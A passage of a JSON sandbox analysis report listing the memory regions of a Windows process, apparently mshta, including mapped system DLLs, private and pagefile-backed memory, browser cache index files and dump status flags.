"\\Windows\\System32\\advapi32.dll", "id": "region_724", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:02.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_726", "name": "private_0x0000000000470000", "norm_filename": null, "region_type": "private_memory", "start_va": 4653056, "timestamp": "00:01:02.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_727", "name": "private_0x00000000005d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6094848, "timestamp": "00:01:02.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7208959, "entry_point": 0, "filename": null, "id": "region_728", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:02.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_729", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:01:02.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9011200, "start_va": 8791270096896, "type": "region", "version": 1 }, "end_va": 8791279108095, "entry_point": 8791270118592, "filename": "\\Windows\\System32\\mshtml.dll", "id": "region_761", "name": "mshtml.dll", "norm_filename": "c:\\windows\\system32\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 8791270096896, "timestamp": "00:01:03.124", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_784", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:03.181", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_785", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:03.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_786", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:03.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_787", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:03.183", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_788", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:03.184", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_789", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:03.185", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1540096, "start_va": 8791768498176, "type": "region", "version": 1 }, "end_va": 8791770038271, "entry_point": 8791768502496, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_790", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 8791768498176, "timestamp": "00:01:03.186", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1220608, "start_va": 8791787438080, "type": "region", "version": 1 }, "end_va": 8791788658687, "entry_point": 8791787442388, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_791", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 8791787438080, "timestamp": "00:01:03.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_792", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:03.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2461696, "start_va": 8791763845120, "type": "region", "version": 1 }, "end_va": 8791766306815, "entry_point": 8791763850048, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_793", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 8791763845120, "timestamp": "00:01:03.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_794", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:03.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1470464, "start_va": 8791756374016, "type": "region", "version": 1 }, "end_va": 8791757844479, "entry_point": 8791756378304, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_795", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 8791756374016, "timestamp": "00:01:03.191", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791756046336, "type": "region", "version": 1 }, "end_va": 8791756107775, "entry_point": 8791756050464, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_796", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 8791756046336, "timestamp": "00:01:03.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791630807040, "type": "region", "version": 1 }, "end_va": 8791631048703, "entry_point": 8791630811248, "filename": "\\Windows\\System32\\msls31.dll", "id": "region_797", "name": "msls31.dll", "norm_filename": "c:\\windows\\system32\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 8791630807040, "timestamp": "00:01:03.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_798", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:03.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 167936, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 954367, "entry_point": 790544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_799", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 786432, "timestamp": "00:01:03.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9863167, "entry_point": 0, "filename": null, "id": "region_800", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:03.195", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_802", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:03.197", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_803", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:03.198", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 11472895, "entry_point": 0, "filename": null, "id": "region_807", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:01:03.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 32505855, "entry_point": 0, "filename": null, "id": "region_808", "name": "pagefile_0x0000000000b00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11534336, "timestamp": "00:01:03.215", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_809", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_810", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_811", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:03.263", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_820", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:03.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_821", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:03.288", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_834", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:03.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34209792, "type": "region", "version": 1 }, "end_va": 35258367, "entry_point": 0, "filename": null, "id": "region_837", "name": "private_0x00000000020a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34209792, "timestamp": "00:01:03.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_838", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:03.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_839", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:03.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_840", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:03.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_841", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:01:03.435", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_842", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:03.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1691647, "entry_point": 1179648, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_846", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:03.463", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1691647, "entry_point": 1232584, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_847", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 1179648, "timestamp": "00:01:03.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_848", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:03.476", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000849-addr_0x00000000021a0000-size_0x00000000001f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2031616, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_849", "name": "private_0x00000000021a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 35258368, "timestamp": "00:01:03.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7073791, "entry_point": 0, "filename": null, "id": "region_854", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:01:03.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, "entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_855", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": "00:01:03.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 40235007, "entry_point": 37289984, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_863", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 37289984, "timestamp": "00:01:03.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 43659263, "entry_point": 0, "filename": null, "id": "region_864", "name": "pagefile_0x0000000002660000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40239104, "timestamp": "00:01:03.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_865", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:03.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_866", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:03.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_867", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:03.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_868", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:03.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1294335, "entry_point": 1245184, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_869", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1245184, "timestamp": "00:01:03.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1343487, "entry_point": 1310720, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_870", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:01:03.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 1376256, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_871", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 1376256, "timestamp": "00:01:03.534", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1703935, "entry_point": 1441792, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_872", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 1441792, "timestamp": "00:01:03.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_880", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:01:03.564", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_881", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:03.565", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2822143, "entry_point": 0, "filename": null, "id": "region_882", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:01:03.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 2887679, "entry_point": 2883584, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_886", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2883584, "timestamp": "00:01:03.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2957311, "entry_point": 0, "filename": 